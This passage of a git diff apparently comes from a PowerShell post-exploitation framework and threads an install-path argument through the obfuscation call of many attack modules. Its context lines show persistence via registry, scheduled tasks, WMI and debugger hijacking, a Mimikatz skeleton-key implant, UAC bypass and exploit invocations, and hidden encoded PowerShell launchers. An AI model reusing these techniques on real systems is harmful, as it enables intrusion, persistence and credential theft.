-PoshCode %s" % (procName, launcherCode) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/reflective_inject.py b/lib/modules/powershell/management/reflective_inject.py index 1bb50a9..e5d19ea 100644 --- a/lib/modules/powershell/management/reflective_inject.py +++ b/lib/modules/powershell/management/reflective_inject.py @@ -146,7 +146,7 @@ class Module: UploadScript = self.mainMenu.stagers.generate_upload(dll, fullUploadPath) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += "\r\n" script += UploadScript diff --git a/lib/modules/powershell/management/restart.py b/lib/modules/powershell/management/restart.py index 867a650..dee7562 100644 --- a/lib/modules/powershell/management/restart.py +++ b/lib/modules/powershell/management/restart.py @@ -52,5 +52,5 @@ class Module: script = "'Restarting computer';Restart-Computer -Force" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/runas.py b/lib/modules/powershell/management/runas.py index c61dfb1..1978eb7 100644 --- a/lib/modules/powershell/management/runas.py +++ b/lib/modules/powershell/management/runas.py @@ -138,6 +138,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/sid_to_user.py b/lib/modules/powershell/management/sid_to_user.py index 20f81c3..9978ce0 100644 --- a/lib/modules/powershell/management/sid_to_user.py +++ b/lib/modules/powershell/management/sid_to_user.py @@ -57,5 +57,5 @@ class Module: script = "(New-Object System.Security.Principal.SecurityIdentifier(\"%s\")).Translate( [System.Security.Principal.NTAccount]).Value" %(self.options['SID']['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/spawn.py b/lib/modules/powershell/management/spawn.py index 80e29df..30bd569 100644 --- a/lib/modules/powershell/management/spawn.py +++ b/lib/modules/powershell/management/spawn.py @@ -100,5 +100,5 @@ class Module: code = "Start-Process -NoNewWindow -FilePath \"%s\" -ArgumentList '%s'; 'Agent spawned to %s'" % (parts[0], " ".join(parts[1:]), listenerName) if obfuscate: - code = helpers.obfuscate(psScript=code, obfuscationCommand=obfuscationCommand) + code = helpers.obfuscate(self.mainMenu.installPath, psScript=code, obfuscationCommand=obfuscationCommand) return code diff --git a/lib/modules/powershell/management/spawnas.py b/lib/modules/powershell/management/spawnas.py index 43151eb..d54baa6 100644 --- a/lib/modules/powershell/management/spawnas.py +++ b/lib/modules/powershell/management/spawnas.py @@ -157,6 +157,6 @@ class Module: scriptEnd += "-Cmd \"$env:public\debug.bat\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/switch_listener.py b/lib/modules/powershell/management/switch_listener.py index 8d5b3da..e021401 100644 --- a/lib/modules/powershell/management/switch_listener.py +++ b/lib/modules/powershell/management/switch_listener.py @@ -71,5 +71,5 @@ class Module: # signal the existing listener that we're switching listeners, and the new comms code commsCode = "Send-Message -Packets $(Encode-Packet -Type 130 -Data '%s');\n%s" % (listenerName, commsCode) if obfuscate: - commsCode = helpers.obfuscate(psScript=commsCode, obfuscationCommand=obfuscationCommand) + commsCode = helpers.obfuscate(self.mainMenu.installPath, psScript=commsCode, obfuscationCommand=obfuscationCommand) return commsCode diff --git a/lib/modules/powershell/management/timestomp.py b/lib/modules/powershell/management/timestomp.py index bb20f46..69a5b91 100644 --- a/lib/modules/powershell/management/timestomp.py +++ b/lib/modules/powershell/management/timestomp.py @@ -108,6 +108,6 @@ class Module: scriptEnd += "| Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/user_to_sid.py b/lib/modules/powershell/management/user_to_sid.py index 861b7bd..b6bbddd 100644 --- a/lib/modules/powershell/management/user_to_sid.py +++ b/lib/modules/powershell/management/user_to_sid.py @@ -63,5 +63,5 @@ class Module: script = "(New-Object System.Security.Principal.NTAccount(\"%s\",\"%s\")).Translate([System.Security.Principal.SecurityIdentifier]).Value" %(self.options['Domain']['Value'], self.options['User']['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/vnc.py b/lib/modules/powershell/management/vnc.py index e3ef899..e8f4836 100644 --- a/lib/modules/powershell/management/vnc.py +++ b/lib/modules/powershell/management/vnc.py @@ -102,6 +102,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/wdigest_downgrade.py b/lib/modules/powershell/management/wdigest_downgrade.py index c8edfda..ecec54f 100644 --- a/lib/modules/powershell/management/wdigest_downgrade.py +++ b/lib/modules/powershell/management/wdigest_downgrade.py @@ -151,5 +151,5 @@ function Invoke-WdigestDowngrade { else: script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/zipfolder.py b/lib/modules/powershell/management/zipfolder.py index 8771365..8dc5ca5 100644 --- a/lib/modules/powershell/management/zipfolder.py +++ b/lib/modules/powershell/management/zipfolder.py @@ -93,5 +93,5 @@ Invoke-ZipFolder""" if values['Value'] and values['Value'] != '': script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/elevated/registry.py b/lib/modules/powershell/persistence/elevated/registry.py index 8fd7f1d..2ab37ac 100644 --- a/lib/modules/powershell/persistence/elevated/registry.py +++ b/lib/modules/powershell/persistence/elevated/registry.py @@ -205,5 +205,5 @@ class Module: script += "'Registry persistence established "+statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/elevated/schtasks.py b/lib/modules/powershell/persistence/elevated/schtasks.py index 3f130c0..fbad434 100644 --- a/lib/modules/powershell/persistence/elevated/schtasks.py +++ b/lib/modules/powershell/persistence/elevated/schtasks.py @@ -161,7 +161,7 @@ class Module: script += "schtasks /Delete /F /TN "+taskName+";" script += "'Schtasks persistence removed.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script if extFile != '': @@ -241,5 +241,5 @@ class Module: statusMsg += " with "+taskName+" daily trigger at " + dailyTime + "." script += "'Schtasks persistence established "+statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/elevated/wmi.py b/lib/modules/powershell/persistence/elevated/wmi.py index 50e82a9..9b68e0c 100644 --- a/lib/modules/powershell/persistence/elevated/wmi.py +++ b/lib/modules/powershell/persistence/elevated/wmi.py @@ -124,7 +124,7 @@ class Module: script += "Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object { $_.filter -match '"+subName+"'} | Remove-WmiObject;" script += "'WMI persistence removed.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script if extFile != '': @@ -199,5 +199,5 @@ class Module: script += "'WMI persistence established "+statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/add_netuser.py b/lib/modules/powershell/persistence/misc/add_netuser.py index 0d41676..44fc980 100644 --- a/lib/modules/powershell/persistence/misc/add_netuser.py +++ b/lib/modules/powershell/persistence/misc/add_netuser.py @@ -107,5 +107,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/add_sid_history.py b/lib/modules/powershell/persistence/misc/add_sid_history.py index 914b281..9f148f2 100644 --- a/lib/modules/powershell/persistence/misc/add_sid_history.py +++ b/lib/modules/powershell/persistence/misc/add_sid_history.py @@ -90,6 +90,6 @@ class Module: # base64 encode the command to pass to Invoke-Mimikatz scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/persistence/misc/debugger.py b/lib/modules/powershell/persistence/misc/debugger.py index 19be5a7..f9f8c6f 100644 --- a/lib/modules/powershell/persistence/misc/debugger.py +++ b/lib/modules/powershell/persistence/misc/debugger.py @@ -94,7 +94,7 @@ class Module: # the registry command to disable the debugger for Utilman.exe script = "Remove-Item 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\%s';'%s debugger removed.'" %(targetBinary, targetBinary) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script @@ -133,5 +133,5 @@ class Module: # the registry command to set the debugger for the specified binary to be the binary path specified script = "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+targetBinary+"';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+targetBinary+"' -Name Debugger -Value '"+triggerBinary+"';'"+targetBinary+" debugger set to "+triggerBinary+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py b/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py index d06efe4..1ef774a 100644 --- a/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py +++ b/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py @@ -61,10 +61,10 @@ class Module: if cleanup.lower() == 'true': script = "$null=Set-ItemProperty -Force -Path HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters -Name DisablePasswordChange -Value 0; 'Machine account password change re-enabled.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script script = "$null=Set-ItemProperty -Force -Path HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters -Name DisablePasswordChange -Value 1; 'Machine account password change disabled.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/get_ssps.py b/lib/modules/powershell/persistence/misc/get_ssps.py index 88a9c2c..5206dab 100644 --- a/lib/modules/powershell/persistence/misc/get_ssps.py +++ b/lib/modules/powershell/persistence/misc/get_ssps.py @@ -191,5 +191,5 @@ Get-SecurityPackages if values['Value'] and values['Value'] != '': script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/install_ssp.py b/lib/modules/powershell/persistence/misc/install_ssp.py index d8f7df8..8e717d6 100644 --- a/lib/modules/powershell/persistence/misc/install_ssp.py +++ b/lib/modules/powershell/persistence/misc/install_ssp.py @@ -264,5 +264,5 @@ into lsass, the dll must export SpLsaModeInitialize. if values['Value'] and values['Value'] != '': script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/memssp.py b/lib/modules/powershell/persistence/misc/memssp.py index 42d4e3a..2e6cabc 100644 --- a/lib/modules/powershell/persistence/misc/memssp.py +++ b/lib/modules/powershell/persistence/misc/memssp.py @@ -79,6 +79,6 @@ class Module: scriptEnd += '"memssp installed, check C:\Windows\System32\mimisla.log for logon events."' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/persistence/misc/skeleton_key.py b/lib/modules/powershell/persistence/misc/skeleton_key.py index 36c3a52..58bc424 100644 --- a/lib/modules/powershell/persistence/misc/skeleton_key.py +++ b/lib/modules/powershell/persistence/misc/skeleton_key.py @@ -79,6 +79,6 @@ class Module: scriptEnd += '"Skeleton key implanted. Use password \'mimikatz\' for access."' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/persistence/powerbreach/deaduser.py b/lib/modules/powershell/persistence/powerbreach/deaduser.py index 7c75df6..1ecb1b3 100644 --- a/lib/modules/powershell/persistence/powerbreach/deaduser.py +++ b/lib/modules/powershell/persistence/powerbreach/deaduser.py @@ -185,7 +185,7 @@ Invoke-DeadUserBackdoor""" return "" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) # transform the backdoor into something launched by powershell.exe # so it survives the agent exiting modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc " @@ -196,6 +196,6 @@ Invoke-DeadUserBackdoor""" # set up the start-process command so no new windows appears scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-DeadUserBackdoor started'" % (parts[0], " ".join(parts[1:])) if obfuscate: - scriptLauncher = helpers.obfuscate(psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) + scriptLauncher = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) return scriptLauncher diff --git a/lib/modules/powershell/persistence/powerbreach/eventlog.py b/lib/modules/powershell/persistence/powerbreach/eventlog.py index eab55ee..faa4236 100644 --- a/lib/modules/powershell/persistence/powerbreach/eventlog.py +++ b/lib/modules/powershell/persistence/powerbreach/eventlog.py @@ -160,7 +160,7 @@ Invoke-EventLogBackdoor""" return "" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) # transform the backdoor into something launched by powershell.exe # so it survives the agent exiting modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc " @@ -171,7 +171,7 @@ Invoke-EventLogBackdoor""" # set up the start-process command so no new windows appears scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-EventLogBackdoor started'" % (parts[0], " ".join(parts[1:])) if obfuscate: - scriptLauncher = helpers.obfuscate(psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) + scriptLauncher = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) print scriptLauncher diff --git a/lib/modules/powershell/persistence/powerbreach/resolver.py b/lib/modules/powershell/persistence/powerbreach/resolver.py index 554a3cc..c26a99a 100644 --- a/lib/modules/powershell/persistence/powerbreach/resolver.py +++ b/lib/modules/powershell/persistence/powerbreach/resolver.py @@ -172,7 +172,7 @@ Invoke-ResolverBackdoor""" return "" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) # transform the backdoor into something launched by powershell.exe # so it survives the agent exiting modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc " @@ -183,5 +183,5 @@ Invoke-ResolverBackdoor""" # set up the start-process command so no new windows appears scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-EventLogBackdoor started'" % (parts[0], " ".join(parts[1:])) if obfuscate: - scriptLauncher = helpers.obfuscate(psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) + scriptLauncher = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) return scriptLauncher diff --git a/lib/modules/powershell/persistence/userland/backdoor_lnk.py b/lib/modules/powershell/persistence/userland/backdoor_lnk.py index 87e8009..822f03c 100644 --- a/lib/modules/powershell/persistence/userland/backdoor_lnk.py +++ b/lib/modules/powershell/persistence/userland/backdoor_lnk.py @@ -180,6 +180,6 @@ class Module: scriptEnd += " -EncScript '%s'" %(encScript) scriptEnd += "; \"Invoke-BackdoorLNK run on path '%s' with stager for listener '%s'\"" %(lnkPath,listenerName) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/persistence/userland/registry.py b/lib/modules/powershell/persistence/userland/registry.py index 651a008..57042d2 100644 --- a/lib/modules/powershell/persistence/userland/registry.py +++ b/lib/modules/powershell/persistence/userland/registry.py @@ -149,7 +149,7 @@ class Module: script += "Remove-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+";" script += "'Registry Persistence removed.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script if extFile != '': @@ -236,5 +236,5 @@ class Module: script += "'Registry persistence established "+statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/userland/schtasks.py b/lib/modules/powershell/persistence/userland/schtasks.py index 2abed9e..e4adc53 100644 --- a/lib/modules/powershell/persistence/userland/schtasks.py +++ b/lib/modules/powershell/persistence/userland/schtasks.py @@ -155,7 +155,7 @@ class Module: script += "schtasks /Delete /F /TN "+taskName+";" script += "'Schtasks persistence removed.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script if extFile != '': @@ -234,5 +234,5 @@ class Module: script += "'Schtasks persistence established "+statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/privesc/ask.py b/lib/modules/powershell/privesc/ask.py index a1bb865..83992a1 100644 --- a/lib/modules/powershell/privesc/ask.py +++ b/lib/modules/powershell/privesc/ask.py @@ -113,5 +113,5 @@ else { } ''' %(encLauncher) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/privesc/bypassuac.py b/lib/modules/powershell/privesc/bypassuac.py index f24cea2..2ecdaaf 100644 --- a/lib/modules/powershell/privesc/bypassuac.py +++ b/lib/modules/powershell/privesc/bypassuac.py @@ -115,6 +115,6 @@ class Module: else: scriptEnd = "Invoke-BypassUAC -Command \"%s\"" % (launcher) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/bypassuac_eventvwr.py b/lib/modules/powershell/privesc/bypassuac_eventvwr.py index fcbbb10..85fb4f2 100644 --- a/lib/modules/powershell/privesc/bypassuac_eventvwr.py +++ b/lib/modules/powershell/privesc/bypassuac_eventvwr.py @@ -110,6 +110,6 @@ class Module: else: scriptEnd = "Invoke-EventVwrBypass -Command \"%s\"" % (encScript) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/bypassuac_tokenmanipulation.py b/lib/modules/powershell/privesc/bypassuac_tokenmanipulation.py index 2ac1c2f..0606e5c 100644 --- a/lib/modules/powershell/privesc/bypassuac_tokenmanipulation.py +++ b/lib/modules/powershell/privesc/bypassuac_tokenmanipulation.py @@ -158,7 +158,7 @@ class Module: except Exception as e: pass if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) scriptEnd = "Invoke-BypassUACTokenManipulation -Arguments \"-w 1 -enc %s\"" % (encodedCradle) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/bypassuac_wscript.py b/lib/modules/powershell/privesc/bypassuac_wscript.py index 122d681..48649b2 100644 --- a/lib/modules/powershell/privesc/bypassuac_wscript.py +++ b/lib/modules/powershell/privesc/bypassuac_wscript.py @@ -112,6 +112,6 @@ class Module: else: scriptEnd = "Invoke-WScriptBypassUAC -payload \"%s\"" % (launcher) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/getsystem.py b/lib/modules/powershell/privesc/getsystem.py index c34f848..c8ebaf9 100644 --- a/lib/modules/powershell/privesc/getsystem.py +++ b/lib/modules/powershell/privesc/getsystem.py @@ -115,6 +115,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" scriptEnd += "'Get-System completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/gpp.py b/lib/modules/powershell/privesc/gpp.py index 8cdf96a..fbb929c 100644 --- a/lib/modules/powershell/privesc/gpp.py +++ b/lib/modules/powershell/privesc/gpp.py @@ -83,6 +83,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" scriptEnd += "'Get-GPPPassword completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/mcafee_sitelist.py b/lib/modules/powershell/privesc/mcafee_sitelist.py index 33a4a51..dc07331 100644 --- a/lib/modules/powershell/privesc/mcafee_sitelist.py +++ b/lib/modules/powershell/privesc/mcafee_sitelist.py @@ -82,6 +82,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" scriptEnd += "'Get-SiteListPassword completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/ms16-032.py b/lib/modules/powershell/privesc/ms16-032.py index bc740b2..a78fb84 100644 --- a/lib/modules/powershell/privesc/ms16-032.py +++ b/lib/modules/powershell/privesc/ms16-032.py @@ -101,6 +101,6 @@ class Module: scriptEnd = 'Invoke-MS16032 -Command "' + launcherCode + '"' scriptEnd += ';`nInvoke-MS16032 completed.' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/ms16-135.py b/lib/modules/powershell/privesc/ms16-135.py index 5ce5527..7700817 100644 --- a/lib/modules/powershell/privesc/ms16-135.py +++ b/lib/modules/powershell/privesc/ms16-135.py @@ -102,5 +102,5 @@ class Module: script += 'Invoke-MS16135 -Command "' + launcherCode + '"' script += ';`nInvoke-MS16135 completed.' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/privesc/powerup/allchecks.py b/lib/modules/powershell/privesc/powerup/allchecks.py index d299c2d..31dd7c4 100644 --- a/lib/modules/powershell/privesc/powerup/allchecks.py +++ b/lib/modules/powershell/privesc/powerup/allchecks.py @@ -85,6 +85,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/find_dllhijack.py b/lib/modules/powershell/privesc/powerup/find_dllhijack.py index 190f421..326d3f2 100644 --- a/lib/modules/powershell/privesc/powerup/find_dllhijack.py +++ b/lib/modules/powershell/privesc/powerup/find_dllhijack.py @@ -100,6 +100,6 @@ class Module: scriptEnd += ' | ft -wrap | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_exe_restore.py b/lib/modules/powershell/privesc/powerup/service_exe_restore.py index 5d3b979..d7c00d9 100644 --- a/lib/modules/powershell/privesc/powerup/service_exe_restore.py +++ b/lib/modules/powershell/privesc/powerup/service_exe_restore.py @@ -95,6 +95,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_exe_stager.py b/lib/modules/powershell/privesc/powerup/service_exe_stager.py index c752eee..83da5b2 100644 --- a/lib/modules/powershell/privesc/powerup/service_exe_stager.py +++ b/lib/modules/powershell/privesc/powerup/service_exe_stager.py @@ -128,6 +128,6 @@ class 